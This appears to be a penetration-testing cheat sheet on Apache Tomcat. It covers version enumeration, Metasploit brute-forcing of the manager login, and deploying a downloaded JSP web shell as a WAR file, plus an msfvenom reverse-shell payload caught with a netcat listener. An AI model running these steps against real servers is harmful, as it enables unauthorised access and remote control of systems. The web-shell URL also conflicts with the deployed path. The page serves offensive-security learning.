Apache Tomcat

Apache Tomcat is an open-source Java-based web server and servlet container used to deploy and run Java applications. It is widely used for hosting Java Servlets, JSP (JavaServer Pages), and WebSocket applications. Tomcat is lightweight, efficient, and supports Java EE specifications like JSP and Servlet API.

Tech Stack of Apache Tomcat

Backend: Java (Servlet API, JSP, WebSocket API)
Frontend: HTML, CSS, JavaScript (optional for web apps)
Database: Works with MySQL, PostgreSQL, Oracle, etc. (via JDBC)
Server: Apache Tomcat (self-contained), often used with Apache HTTP Server or Nginx

File Structure

/tomcat-root
│── bin/               # Executable scripts for starting/stopping Tomcat  
│   ├── catalina.sh    # Script to start/stop Tomcat (Linux/macOS)  
│   ├── startup.sh     # Script to start Tomcat  
│   ├── shutdown.sh    # Script to stop Tomcat  
│   ├── catalina.bat   # Windows equivalent of catalina.sh  
│   ├── startup.bat    # Windows script to start Tomcat  
│   ├── shutdown.bat   # Windows script to stop Tomcat  
│── conf/              # Configuration files for Tomcat  
│   ├── server.xml     # Main configuration file (ports, connectors, etc.)  
│   ├── web.xml        # Default web application settings  
│   ├── tomcat-users.xml # User authentication and roles  
│   ├── context.xml    # Default application context settings  
│   ├── catalina.policy # Security policy configuration  
│── logs/              # Log files for Tomcat runtime (catalina.out, localhost.log, etc.)  
│── temp/              # Temporary files (cache, session data, etc.)  
│── webapps/           # Deployed web applications (WAR files and extracted folders)  
│   ├── ROOT/          # Default web application (can be replaced)  
│   ├── examples/      # Tomcat example applications (remove in production)  
│   ├── manager/       # Tomcat Manager web interface (admin panel)  
│   ├── host-manager/  # Virtual host management interface  
│── work/              # Compiled JSP files and temporary data  
│── lib/               # Java libraries and dependencies (JAR files)  
│── LICENSE            # Tomcat license file  
│── NOTICE             # Legal notices for bundled software  
│── RELEASE-NOTES      # Release information and changes  
│── README.md          # Basic information about Tomcat  

Enumeration

## Invalid Path like https://site.rezydev.xyz/invalid-path with 404 page reveals
## info and version of tomcat

## Version Enumeration
curl -s http://site.rezydev.xyz/docs/ | grep Tomcat

danger

If we have a LFI, we can leverage web.xml file for sensitive info leakage.

/manager and the /host-manager are high value endpoints when approaching tomcat.

Exploitation

Bruteforcing

We can bruteforce /manager endpoint with hydra, medusa, burp intruder, metasploit module (auxiliary/scanner/http/tomcat_mgr_login), or any script available for gaining access if weak credentials are in place.

## Bruteforce /manager using Metasploit
set VHOST site.rezydev.xyz
set RPORT 8000
set stop_on_success true
set rhosts 10.10.10.10
run

WAR File Upload

Apache Tomcat provides a web-based manager interface for deploying applications. Users with manager-gui privileges can upload a WAR (Web Application Archive) file to deploy a web shell and gain Remote Code Execution (RCE).

Exploitation Steps

Gain Access to Tomcat Manager
- After obtaining valid credentials (via brute force or other methods) login to /manager/html.

Create a Malicious WAR File

Download a JSP-based web shell:

wget https://raw.githubusercontent.com/tennc/webshell/master/fuzzdb-webshell/jsp/cmd.jsp  

Package the web shell into a WAR file using the zip utility:
```
zip -r ourfile.war cmd.jsp  
```

Upload the WAR File to Tomcat
- Go to Tomcat Manager > Deploy > Browse and select ourfile.war.
- Click Deploy to upload the file.
- The deployed application will be accessible at:
```
http://site.rezydev.xyz:8000/ourfile/
```
Access the Web Shell
- Open the web shell in a browser:
```
http://site.rezydev.xyz:8000/backup/cmd.jsp?cmd=id
```
Gain Reverse Shell Access
- Use msfvenom to generate a JSP-based reverse shell:
```
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.10.10 LPORT=1337 -f war > ourfile.war  
```
- Upload and deploy ourfile.war via Tomcat Manager.
- Start a Netcat listener:
```
nc -lnvp 1337
```
- Click on /ourfile/ to execute the payload and receive a reverse shell.

Automating with Metasploit

The multi/http/tomcat_mgr_upload Metasploit module can automate the WAR deployment and execution process.

Known Vulnerabilities

CVE-2020-1938 - Ghostcat

Tech Stack of Apache Tomcat​

File Structure​

Enumeration​

Exploitation​

Bruteforcing​

WAR File Upload​

Automating with Metasploit​

Known Vulnerabilities​